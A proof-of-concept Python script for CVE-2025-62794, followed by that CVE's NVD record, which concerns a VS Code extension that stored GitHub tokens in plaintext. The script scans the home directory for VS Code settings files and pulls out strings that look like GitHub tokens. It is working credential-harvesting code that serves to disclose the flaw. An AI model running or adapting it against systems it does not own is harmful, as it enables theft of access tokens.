CVE-2025-62794

# CVE-2025-62794 PoC - GitHub Workflow Updater Token Exposure # This PoC demonstrates how an attacker with read access to the home directory # can extract plaintext GitHub tokens stored by the vulnerable extension import os import json import glob def find_vscode_config(): """Search for VS Code configuration files""" home = os.path.expanduser("~") config_paths = [ os.path.join(home, ".config", "Code", "User", "settings.json"), os.path.join(home, ".vscode", "settings.json"), os.path.join(home, "AppData", "Roaming", "Code", "User", "settings.json"), ] # Also search for any extension settings for path in glob.glob(os.path.join(home, ".vscode", "**", "*.json"), recursive=True): config_paths.append(path) return config_paths def extract_tokens(config_file): """Extract potential GitHub tokens from config file""" tokens = [] try: with open(config_file, 'r') as f: data = json.load(f) # Search for common GitHub token field names token_fields = ['github-token', 'github.token', 'gh-token', 'githubWorkflowUpdater.token', 'accessToken'] for field in token_fields: if field in data and isinstance(data[field], str): if data[field].startswith('ghp_') or data[field].startswith('github_pat_'): tokens.append({ 'field': field, 'token': data[field], 'source': config_file }) except (json.JSONDecodeError, FileNotFoundError, PermissionError): pass return tokens def main(): print("CVE-2025-62794 - GitHub Workflow Updater Token Extraction PoC") print("=" * 60) config_paths = find_vscode_config() all_tokens = [] for config_path in config_paths: tokens = extract_tokens(config_path) all_tokens.extend(tokens) if all_tokens: print(f"[!] Found {len(all_tokens)} potential GitHub tokens:") for i, token_info in enumerate(all_tokens, 1): print(f"\nToken {i}:") print(f" Field: {token_info['field']}") print(f" Token: {token_info['token'][:10]}...{token_info['token'][-4:]}") print(f" Source: {token_info['source']}") else: print("[-] No exposed tokens found in typical locations") print("\n[!] Note: Update to GitHub Workflow Updater 0.0.7+ to fix this vulnerability") if __name__ == "__main__": main()

{"cve": {"id": "CVE-2025-62794", "sourceIdentifier": "[email protected]", "published": "2025-10-28T21:15:40.607", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "GitHub Workflow Updater is a VS Code extension that automatically pins GitHub Actions to specific commits for enhanced security. Before 0.0.7, any provided Github token would be stored in plaintext in the editor configuration as json on disk, rather than through the more secure \"securestorage\" api. An attacker with read only access to your home directory could have read this token and used it to perform actions with that token. Update to 0.0.7."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N", "baseScore": 3.8, "baseSeverity": "LOW", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.0, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-522"}]}], "references": [{"url": "https://github.com/RichardoC/github-workflow-updater-extension/commit/b9518c38ac6bc2a9fda2242e6daef17f7184ad1f", "source": "[email protected]"}, {"url": "https://github.com/RichardoC/github-workflow-updater-extension/security/advisories/GHSA-679x-97jw-8vjp", "source": "[email protected]"}, {"url": "https://github.com/microsoft/vscode-discussions/discussions/748", "source": "[email protected]"}]}}